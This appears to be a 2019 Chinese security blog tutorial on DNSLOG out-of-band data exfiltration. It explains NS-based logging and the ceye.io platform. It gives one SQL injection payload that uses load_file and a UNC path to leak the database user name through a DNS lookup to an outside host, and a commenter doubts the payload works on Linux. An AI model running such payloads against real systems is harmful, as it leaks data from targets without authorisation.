DNS log 学习

作者: print("") 分类: 信息安全 发布时间: 2019-06-07 10:14

DNSLOG的原理

DNS的解析是递归与迭代相结合的,下面给出了当我们访问 www.o2oxy.cn 时.

最后面访问的还是该域名的NS 服务器。阿里云的域名的NS 记录都是可以修改的。也就是说。如果我们本地建立一个NS 的DNS 就可以控制到解析

DNSLOG工具

如果有自己的服务器和域名,可以自建一个这样的平台,直接使用BugScan团队开源的工具搭建即可:

https://github.com/BugScanTeam/DNSLog

另外我们也可以使用在线平台:

http://ceye.io

此次用的是ceye.io 

在浏览器访问一下

在记录中就可以查询到了。那么在其他方面可以利用吗? 如下:

命令执行无回显的情况下:

然后在后台看看情况

发下是root 用户。

那么还有没有其他的利用方式呢?

有的。SQL  注入和其他漏洞也可以使用的

例子:SQL 注入

pyload:

select load_file(concat(‘\\\\’, user(), ‘.hfkzaq.ceye.io’))

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

2 条评论
  • GxBSXUKing

    2019年6月7日 下午5:55

    太菜了,看不懂。

  • xsshim

    2019年12月16日 下午8:36

    嘿嘿我怀疑博主最后一个根本没复现成功 Linux下是不能用 \\ 进行网络请求的

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注